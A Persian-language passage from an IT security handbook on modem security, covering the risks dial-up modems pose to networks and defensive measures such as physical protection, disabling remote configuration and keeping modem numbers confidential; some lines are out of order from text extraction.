ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺑﺴﻴﺎﺭ ﻛﻤﻲ ﺑﻌﻨﻮﺍﻥ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﻣﺴﺘﻘﻞ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﻭ ﺑﻴﺸﺘﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺯ ﻃﺮﻳـﻖ ﻣـﻮﺩﻡ ،ﺷـﺒﻜﻪﻫـﺎ ،ﻭ ﻳـﺎ ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﺑﻲﺳﻴﻢ ﺑﻪ ﺩﻳﮕﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﺘﺼﻞ ﻫﺴﺘﻨﺪ .ﺍﻳﻦ ﻓﺼﻞ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﺍﻧﻲ ﻛﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺑﻪ ﺷﺒﻜﻪﻫـﺎ ﭘﻴﻜﺮﺑﻨـﺪﻱ
ﻣﻲﻛﻨﻨﺪ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ .ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺍﺑﺘﺪﺍ ﻧﺤﻮﺓ ﺍﺗﺼﺎﻝ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺷﺒﻜﻪ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ،ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ،ﻭ ﺍﺑﺰﺍﺭ ﺑـﻲﺳـﻴﻢ ﻭ
ﺑﺎ ﺗﻮﺟﻪ ﻭﻳﮋﻩ ﺑﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻫﺮﻳﻚ ﺍﺯ ﺁﻧﻬﺎ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ ،ﻭ ﺳﭙﺲ ﺑﻪ ﺍﺻﻮﻝ ﺍﻣﻨﻴـﺖ ﺷـﺒﻜﻪ ﺩﺭ ﺷـﺒﻜﻪﻫـﺎﻱ TCP/IP
-ﭘﺮﻭﺗﻜﻞ ﻏﺎﻟﺐ ﺷﺒﻜﻪ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﻭ ﻧﻴﺰ ﺍﻳﻨﺘﺮﻧﺖ -ﻣﻲﭘﺮﺩﺍﺯﻳﻢ.
ﻣﻮﺩﻡ
ﺩﺭ ﻣﺮﺣﻠﺔ ﻓﻌﻠﻲ ﺍﺯ ﺭﺷﺪ ﺟﻬﺎﻧﻲ ﺍﻳﻨﺘﺮﻧﺖ ،ﻫﻨﻮﺯ ﺩﻻﻳﻞ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺗﻮﺟﻪ ﺑﻪ ﺍﻣﻨﻴﺖ ﻣﻮﺩﻣﻬﺎ ﻭ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻨﻲ ﻣﺮﺗﺒﻂ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ
ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻨﻲ ﺳﺎﺩﻩ ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﺁﻥ ﻧﻴﺰ ﻛﻢﻫﺰﻳﻨﻪ ﺍﺳﺖ ،ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻫﻤﭽﻨﺎﻥ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ؛ ﺁﻧﭽﻨـﺎﻥ
ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﻣﺪﺕ ﻳﻚ ﺩﻫﻪ ﻳﺎ ﺣﺘﻲ ﺑﻴﺶ ﺍﺯ ﺁﻥ ﺩﺭﺣﺎﻝ ﻛﺎﺭ ﻫﺴﺘﻨﺪ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺣﺘﻲ ﺑﺎ ﻭﺟﻮﺩ ﺩﺳﺘﺮﺳﻲ ﻭﺳﻴﻊ ﺑﻪ ﺷﺒﻜﻪﻫـﺎﻱ
ﻣﺤﻠﻲ ﻭ ﺍﺗﺼﺎﻻﺕ ﭘﺮﺳﺮﻋﺖ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﻻﻳﻞ ﻗﺎﻧﻊﻛﻨﻨﺪﺓ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻳﻚ ﺷـﺒﻜﻪ ﺑـﺎ ﺍﺗـﺼﺎﻻﺕ
ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻮﺩﻡ ﻫﺪﺍﻳﺖ ﻛﻨﺪ .ﺍﮔﺮ ﻛﺎﺭﻛﻨﺎﻥ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺑﺨﻮﺍﻫﻨﺪ ﺩﺭ ﻣﻨﺰﻝ ﭘﺲ ﺍﺯ ﺳﺎﻋﺖ ﺍﺩﺍﺭﻱ ﻭ ﻳﺎ ﺩﺭ ﺗﻌﻄـﻴﻼﺕ ﺁﺧـﺮ ﻫﻔﺘـﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﺔ
ﻣﺤﻞ ﻛﺎﺭ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ،ﺑﻜﺎﺭ ﺑﺮﺩﻥ ﻳﻚ ﻣﻮﺩﻡ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﺮﺍﻳﺸﺎﻥ ﻓﺮﺍﻫﻢ ﺳﺎﺯﺩ .ﺍﺯ ﺍﻳﻦ ﻃﺮﻳﻖ ﺭﺍﻫﺒﺮﺍﻥ ﻫﻢ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑـﺎ
ﻼ ﺑـﻪ ﻳـﻚ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺗﻠﻔﻨﻲ ﺑﺎ ﺷﺒﻜﺔ ﻣﻮﺭﺩ ﻧﻈﺮ ،ﺁﻧﺮﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻭ ﺭﺍﻫﺒﺮﻱ ﻛﻨﻨﺪ .ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﻭﻗﺘﻲ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﻛﻨـﺎﻥ ﻣـﺜ ﹰ
ﺭﻭﺳﺘﺎ ﻫﻢ ﺳﻔﺮ ﻛﻨﺪ ،ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻮﺩﻡ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﻣﺤﻞ ﻛﺎﺭ ﺧﻮﺩ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛ ﺧﺼﻮﺻﹰﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺧـﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺩﺭ
ﺳﻄﺢ ﻣﻠﻲ ﻫﻨﻮﺯ ﺍﺭﺍﺋﻪ ﻧﺸﺪﻩ ﻭ ﻳﺎ ﺍﮔﺮ ﻫﻢ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ،ﺍﻳﻤﻦ ﻧﻴﺴﺖ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻻ ﺑﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻭ ﺭﻣـﺰﻋﻠﻴﺮﻏﻢ ﻫﻤﺔ ﺍﻳﻦ ﻣﺰﺍﻳﺎ ،ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻮﺩﻡ ﻣﺨﺎﻃﺮﺍﺕ ﻓﺮﺍﻭﺍﻧﻲ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺭﺩ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻣﺮﺩﻡ ﻣﻌﻤﻮ ﹰ
ﻋﺒﻮﺭ ﺧﻮﺩ ﺍﺯ ﻣﻮﺩﻡ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻮﺩﻡ ﻭ ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺁﻥ ﺑﺪﺭﺳﺘﻲ ﻧﺼﺐ ﺷـﺪﻩﺍﻧـﺪ ،ﺻـﺤﻴﺢ
ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﺩﻗﻴﻘﹰﺎ ﺁﻧﭽﻪ ﻛﻪ ﺷﻤﺎ ﺍﻧﺘﻈﺎ ﹺﺭ ﺁﻧﺮﺍ ﺩﺍﺭﻳﺪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻨﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﻳﻚ ﺧﻂ ﺗﻠﻔﻦ ﺁﻧﺎﻟﻮﮒ ﺳﺎﺩﻩ ﻭ ﻳﺎ ﺣﺘﻲ ﻳﻚ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﺑﺮﻗﺮﺍﺭ ﺷﻮﺩ ،ﻳﻚ ﻓﺮﺩ ﻣﻌﻤﻮﻟﻲ ﻓﺎﻗﺪ ﺑﺪﻭﻥ ﺩﺍﻧـﺶ ﻳـﺎ ﻣﺠـﻮﺯ ﺧـﺎﺹ ﺍﺯ ﻣـﺪﻳﺮﻳﺖ
ﺳﺎﺯﻣﺎﻥ ﻧﻴﺰ ﺑﺴﺎﺩﮔﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﺪ.
ﻣﻮﺩﻡ ﻳﻚ ﺍﺑﺰﺍﺭ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺩﻫﺔ ١٩٦٠ﺑﻮﺟﻮﺩ ﺁﻣﺪ ،ﺑﺮﺍﻱ ﺑﺎﺭ ﺍﻭﻝ ﺩﺭ ﺩﻫﺔ ١٩٧٠ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓـﺖ ،ﻭ
ﺩﺭ ﺩﻫﻪﻫﺎﻱ ١٩٨٠ﻭ ١٩٩٠ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﻋﻤﻮﻣﻴﺖ ﻳﺎﻓﺖ .ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﻣﻮﺩﻣﻬﺎ ﻫﻨﻮﺯ ﻫﻢ ﻭﺍﺟﺪ ﺟﺎﻳﮕﺎﻩ ﻣﻬﻤﻲ ﺩﺭ ﭼـﺸﻢﺍﻧـﺪﺍﺯ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﺍﻣﺮﻭﺯ ﻫﺴﺘﻨﺪ .ﻣﻬﺎﺟﻤﺎﻥ ﻣﻲﺩﺍﻧﻨﺪ ﻛﻪ ﺑﺎ ﻳﺎﻓﺘﻦ ﻣﻮﺩﻣﻬﺎﻳﻲ ﻛﻪ ﺑﺪﺭﺳﺘﻲ ﺍﻣﻦ ﻧﺸﺪﻩﺍﻧﺪ ،ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻳﻲ ﻛـﻪ ﺍﺯ ﺳـﺎﻳﺮ ﺟﻬـﺎﺕ ﻣـﻮﺭﺩ
ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻧﻔﻮﺫ ﻧﻤﺎﻳﻨﺪ ،ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎﻳﺪ ﺑﺎ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻣﻮﺩﻣﻬﺎ ﺁﺷﻨﺎ ﺑﺎﺷﻨﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٧٨
ﺍﻣﻨﻴﺖ ﻣﻮﺩﻣﻬﺎ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻮﺩﻡ ﻣﻮﺟﺐ ﭘﺪﻳﺪ ﺁﻣﺪﻥ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻣﻲﺷﻮﺩ ،ﭼﺮﺍﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭ ﺟﻬﺎﻥ ﺧـﺎﺭﺝ ﺍﺯ ﺁﻥ ﺍﻳﺠـﺎﺩ ﺍﺭﺗﺒـﺎﻁ ﻛﻨـﺪ.
ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻓﺮﺍﺩ ﺩﺭﻭﻥ ﺳﺎﺯﻣﺎﻥ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ﺑﺮﺍﻱ ﺣﺬﻑ ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ ﻭ ﻣﺤﺮﻣﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ؛ ﻭ ﺍﻓﺮﺍﺩ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ
ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﻜﺎﺭ ﮔﻴﺮﻧﺪ .ﺍﮔﺮ ﻣﻮﺩﻣﻬﺎﻱ ﺷﻤﺎ ﻗﺎﺑﻞ ﺗﺨﺮﻳﺐ ﻭ ﻳﺎ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻣﺠـﺪﺩ ﺑﺎﺷـﻨﺪ ،ﻣـﻲﺗﻮﺍﻧﻨـﺪ
ﺑﻤﻨﻈﻮﺭ ﮔﻤﺮﺍﻩ ﻛﺮﺩﻥ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺍﻓﺸﺎﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ﺁﻧﻬﺎ ﺑﻜﺎﺭ ﺭﻭﻧﺪ؛ ﻭ ﺩﺳﺖ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺍﻃﻼﻋـﺎﺕ ﺍﻧﺘﻘـﺎﻟﻲ ﺍﺯ
ﻃﺮﻳﻖ ﻣﻮﺩﻡ ﺭﺍ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻧﻤﺎﻳﻨﺪ.
ﻋﻠﻴﺮﻏﻢ ﮔﺴﺘﺮﺵ ﺍﻳﻨﺘﺮﻧﺖ ،ﻣﻮﺩﻣﻬﺎ ﻫﻨﻮﺯ ﻭﺳﻴﻠﺔ ﺑﺴﻴﺎﺭ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ﻫﺴﺘﻨﺪ .ﺩﻟﻴﻞ ﺳﺎﺩﺓ ﺍﻳﻦ ﻣﺴﺌﻠﻪ
ﻻ ﻣﻮﺩﻣﻬـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﻣـﻮﺭﺩ ﻣﺤﺎﻓﻈـﺖ ﻳـﺎ
ﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺷﺪﺕ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨﻨﺪ ،ﺍﻣﺎ ﻣﻌﻤﻮ ﹰ
ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﺮﭼﻨﺪ ﺷﺮﻛﺘﻬﺎ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﺒﻜﻪﺍ ﹺ
ﻣﻤﻴﺰﻱ ﻗﺮﺍﺭ ﻧﻤﻲﺩﻫﻨﺪ ﻭ ﺍﻳﻦ ﺩﺭﺣﺎﻟﻲ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻛﺜﺮ ﺭﺳﺎﻧﺪﻥ ﺿﺮﻳﺐ ﺍﻣﻨﻴﺘﻲ ،ﻣﻮﺩﻣﻬﺎ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﺭﺍﻫﺒﺮﻱ ﺷﻮﻧﺪ.
ﮔﺎﻡ ﺍﻭﻝ ،ﺣﻔﺎﻇﺖ ﺍﺯ ﺧﻮﺩ ﻣﻮﺩﻡ ﺍﺳﺖ .ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﻣﻮﺩﻣﻬﺎ ﺍﺯ ﻧﻈـﺮ ﻓﻴﺰﻳﻜـﻲ ﺩﺭ ﻣﻜـﺎﻥ ﺍﻣﻨـﻲ ﻗـﺮﺍﺭ ﺩﺍﺭﻧـﺪ ،ﺑﮕﻮﻧـﻪﺍﻱ ﻛـﻪ
ﺩﺳﺘﺮﺳﻲ ﺍﻓﺮﺍﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﻧﻴﺴﺖ .ﻫﺪﻑ ﺍﺯ ﺍﻳﻦ ﻧﻮﻉ ﺣﻔﺎﻇﺖ ،ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺩﺳﺘﻜﺎﺭﻱ ﻭ ﺗﻐﻴﻴﺮ ﺍﺗـﺼﺎﻻﺕ ﻣﻮﺩﻣﻬـﺎ ﺍﺳـﺖ .ﺑـﺎ
ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻣﺘﻴﺎﺯ ﺩﺳﺘﺮﺳﻲ ﻣﻨﺎﺳﺐ ﺑﻪ ﺑﻌﻀﻲ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ،ﻣﻲﺗﻮﺍﻥ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﻮﭼـﻚ ﺭﺍ ﺩﺳـﺘﻜﺎﺭﻱ ﻭ ﺳـﭙﺲ
ﺑﺎﺭﮔﺬﺍﺭﻱ ﻣﺠﺪﺩ ﻛﺮﺩ ،ﻭ ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﻴﺪ ﺍﺯ ﻭﻗﻮﻉ ﭼﻨﻴﻦ ﻣﺴﺎﺋﻠﻲ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻴﺪ .ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﮔﺰﻳﻨﻪﻫـﺎﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻣـﻮﺩﻡ )ﺩﺭﺻـﻮﺭﺕ
ﻭﺟﻮﺩ( ﻳﺎﺩﺩﺍﺷﺖ ﺑﺮﺩﺍﺭﻳﺪ ﻭ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺁﻧﻬﺎ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ ﺗﺎ ﺍﺯ ﺩﺳﺘﻜﺎﺭﻱ ﻧﺸﺪﻥ ﺁﻧﻬﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺩﻣﻬﺎﻱ ﺍﻣﺮﻭﺯﻱ ﻗﺎﺑﻠﻴﺘﻲ ﺑﺮﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻭ ﺁﺯﻣﺎﻳﺶ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺩﺍﺭﻧﺪ .ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﺍﻧﺠـﺎﻡ ﺗﻐﻴﻴـﺮﺍﺕ ﺑـﺮﺍﻱ
ﻛﺎﺭﻣﻨﺪﺍﻧﻲ ﻛﻪ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ،ﺍﺩﺍﺭﺍﺕ ﻣﺨﺘﻠﻔﻲ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻣﻲﻛﻨﻨﺪ ﺳﺎﺩﻩﺗﺮ ﺷﻮﺩ ،ﺍﻣﺎ ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻮﺩﻡ ﺭﺍ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻢ ﻧﻴـﺰ
ﺁﺳﺎﻧﺘﺮ ﻣﻲﻧﻤﺎﻳﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺍﮔﺮ ﭼﻨﻴﻦ ﻭﻳﮋﮔﻴﻬﺎﻳﻲ ﺩﺭ ﻣﻮﺩﻡ ﺷﻤﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻭ ﺍﺯ ﺁﻧﻬـﺎ ﺍﺳـﺘﻔﺎﺩﺓ ﺧﺎﺻـﻲ ﻧﻤـﻲﻛﻨﻴـﺪ ،ﺣﺘﻤـﹰﺎ
ﻏﻴﺮﻓﻌﺎﻝ ﺷﺪﻩﺍﻧﺪ.
ﺟﻨﺒﺔ ﻣﻬﻢ ﺩﻳﮕﺮﻱ ﺍﺯ ﺣﻔﺎﻇﺖ ﻣﻮﺩﻣﻬﺎ ،ﺣﻔﺎﻇﺖ ﺍﺯ ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎﻱ ﺁﻧﻬﺎ ﺍﺳﺖ .ﺑﺎ ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎﻱ ﻣﻮﺩﻣﻬﺎ ﻣﺎﻧﻨﺪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺑﺮﺧﻮﺭﺩ ﻛﻨﻴـﺪ
ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻛﺴﻲ ﺟﺰ ﻛﺴﺎﻧﻲ ﻛﻪ ﺑﻪ ﺁﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﻗﺮﺍﺭ ﻧﺪﻫﻴﺪ .ﻋﻤﻮﻣﻲ ﻛﺮﺩﻥ ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎﻱ ﻣﻮﺩﻣﻬﺎ ،ﺍﺣﺘﻤﺎﻝ ﺍﺳـﺘﻔﺎﺩﺓ ﻣﻬﺎﺟﻤـﺎﻥ
ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﺪ .ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺗﻠﻔﻨﻲ ﺷﻤﺎ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺭﺍ ﺩﺍﺭﺩ ﻛﻪ ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎﻱ ﻣﻮﺩﻡ ﺧـﻮﺩ ﺭﺍ ﺗﻐﻴﻴـﺮ
ﺩﻫﻴﺪ ،ﺣﺘﻤﹰﺎ ﺑﺼﻮﺭﺕ ﺳﺎﻟﻴﺎﻧﻪ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ ،ﻭ ﺑﺮﺍﻱ ﻣﻮﺩﻣﻬﺎ ﺷﻤﺎﺭﻩﻫﺎﻳﻲ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻨﻴﺪ ﻛﻪ ﭘﻴﺸﻮﻧﺪ ﻣـﺸﺘﺮﻙ ﺑـﺎ ﺷـﻤﺎﺭﻩ
ﺗﻠﻔﻨﻬﺎﻱ ﻋﺎﺩﻱ ﺳﺎﺯﻣﺎﻧﺘﺎﻥ ﻧﺪﺍﺭﻧﺪ ﻭ ﻟﺬﺍ ﺍﺣﺘﻤﺎﻝ ﺣﺪﺱ ﺯﺩﻩ ﺷﺪﻥ ﺁﻧﻬﺎ ﻧﻴﺰ ﻧﺎﺯﻝ ﺍﺳﺖ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎﻱ ﻣﻮﺩﻣﻬﺎ ﺭﺍ ﻣﻄﻠﻘﹰﺎ ﻣﺤﺮﻣﺎﻧﻪ ﻧﮕﻪ ﺩﺍﺷﺖ ،ﭼﺮﺍﻛﻪ ﺑﻪ ﻫﺮﺣﺎﻝ ﺍﻓﺮﺍﺩﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺑﺎ ﺁﻧﻬﺎ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻧﺪ.
ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺣﺘﻲ ﺍﮔﺮ ﺷﺪﻳﺪﹰﺍ ﺍﺯ ﺍﻳﻦ ﺷﻤﺎﺭﻩﻫﺎ ﻣﺮﺍﻗﺒﺖ ﻛﻨﻴﺪ ،ﺑﺎﺯﻫﻢ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺎ ﮔﺮﻓﺘﻦ ﺗﻤﺎﻡ ﺷﻤﺎﺭﻩﻫﺎﻱ ﻣﻨﻄﻘﺔ ﺷﻤﺎ ،ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧـﺴﺖ
ﻱ ﺻﺮﻑ ،ﺭﺍﻩﺣﻞ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺭﻓﻊ ﺍﻳﻦ ﻣﺨﺎﻃﺮﻩ ﻧﻴـﺴﺖ ﻭ ﻣﻮﺩﻣﻬـﺎ ﻧﻴﺎﺯﻣﻨـﺪ ﺷﻤﺎﺭﻩﻫﺎﻱ ﻣﻮﺩﻣﻬﺎﻱ ﺷﻤﺎ ﺑﻴﺎﺑﻨﺪ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﭘﻨﻬﺎﻥﻛﺎﺭ ﹺ
ﺣﻔﺎﻅ ﻣﺤﻜﻢﺗﺮﻱ ﻫﺴﺘﻨﺪ.
Bannerﻫﺎ
